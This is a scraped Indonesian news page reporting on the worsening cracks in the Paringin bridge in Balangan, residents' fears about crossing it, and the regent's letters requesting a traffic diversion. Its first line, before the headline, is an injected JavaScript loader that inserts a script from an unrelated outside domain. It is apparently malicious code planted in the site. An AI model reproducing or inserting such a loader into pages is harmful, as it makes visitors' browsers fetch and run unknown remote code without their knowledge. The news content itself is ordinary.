(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Kondisi Jembatan Paringin Kian Memprihatinkan, Warga Was-was Saat Melintas!


KANALKALIMANTAN.COM, PARINGIN– Kondisi Jembatan Paringin, Kabupaten Balangan, saat ini semakain parah. Retakan yang semakin meluas hingga membuat beberapa material berjatuhan apabila dilalui mobil bertonase besar.

Adapun plat besi yang telah dipasang oleh BPJN Kalsel untuk memperkuat jalan jembatan kini terlihat melengkung dan ada yang telah terlepas. Meski demikian, warga tetap memakai jalan tersebut meskipun merasa rawan untuk melintas karena menjadi alternatif utama transportasi.

Diungkapkan oleh salah seorang pengguna jalan Dewi (25) bahwa ia kerap melintasi jembatan karena akses lebih dekat dari pada harus mengambil jalan memutar.

“Ada rasa takut bila berbarengan mobil besar,” ungkapnya.

 

Baca juga  : Jualan Sabu, Ibu Rumah Tangga di Banjarbaru Diringkus Polisi

Kerusakan jembatan ini tak jarang juga menyebabkan macet karena pengguna jalan harus bergantian satu arah untuk melewati jembatan.

Dewi berharap jembatan Paringin bisa segeranya diperbaiki dan ada petugas yang dapat mengatur lalu lalang kendaraan yang melintas.

Beberapa bulan setelah diperbaiki, kondisi Jembatan Paringin ternyata kembali alami kerusakan. Jembatan yang merupakan jalan provinsi yang terletak di Jalan A. Yani KM 01 Kota Paringin ini harus dilapisi plat besi untuk menghindari kerusakan lebih parah.

Sebelumnya, Bupati Balangan H Abdul Hadi mengungkapkan, pemerintah daerah akan berkirim surat ke provinsi terkait pemindahan arus lalu lintas imbas dari kerusakan jembatan Paringin yang sudah berbahaya untuk dilewati.

 

Baca juga  : Jalan Sehat Warga Mentaos di Hutan Pinus Merkusi

Ia mengatakan, terkait dengan kondisi jembatan Paringin yang tidak layak untuk dilewati oleh kendaraan maka pemerintah daerah berkirim surat ke Dinas Perhubungan Provinsi Kalimantan Selatan, berkirim surat ke Balai Jalan Nasional, kemudian berkirim surat ke Bidang Bina Marga Provinsi Kalimantan Selatan.

Termasuk juga bersurat ke Dirlantas Polda Kalsel untuk pengalihan arus lalu lintas yang melewati jembatan. (Kanalkalimantan.com/alfi)

Reporter : alfi
Editor : cell


Desy Arfianty

Recent Posts

Lomba Mancing Ikan di Sungai Kemuning Meriahkan HUT ke-17 Kecamatan Banjarbaru Selatan

KANALKALIMANTAN.COM, BANJARBARU - Warga Kecamatan Banjarbaru Selatan antusias memeriahkan lomba memancing ikan yang digelar di… Read More

34 menit ago

Peduli Korban Kebakaran di Cempaka, Srikandi PLN Salurkan Bantuan Perlengkapan Dapur

KANALKALIMANTAN.COM, BANJARBARU – Srikandi PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B)… Read More

2 jam ago

Bupati dan Wabup Banjar Hadiri Haul Ke-86 Datu Kasyful Anwar

KANALKALIMANTAN.COM, MARTAPURA - Ribuan orang memadati area kubah tempat dilaksanakannya haul ke-86 Tuan Guru KH… Read More

6 jam ago

Lelaki di Banjarmasin Habisi Kakak Ipar, Jasad Dibuang ke Wilayah Kintap

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian dari Satuan Reserse Kriminal (Satreskrim) Polresta Banjarmasin mengungkap kasus pembunuhan yang… Read More

6 jam ago

Tingkatkan Capaian Akses Layanan Air Limbah dan Air Minum, Dinas PUPR Kalsel Gelar Workshop

KANALKALIMANTAN.COM, BANJARBARU - Workshop Implementasi Jastrada Air Minum Provinsi Kalsel tahun 2024 di Banjarmasin digelar… Read More

24 jam ago

Ikuti Festival Tunas Bahasa Ibu Nasional di jakarta, Murid SDN Indrasari 2 Audiensi ke Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Murid kelas 5 SDN Indrasari 2 Martapura, M Royan bersama guru dan… Read More

24 jam ago

This website uses cookies.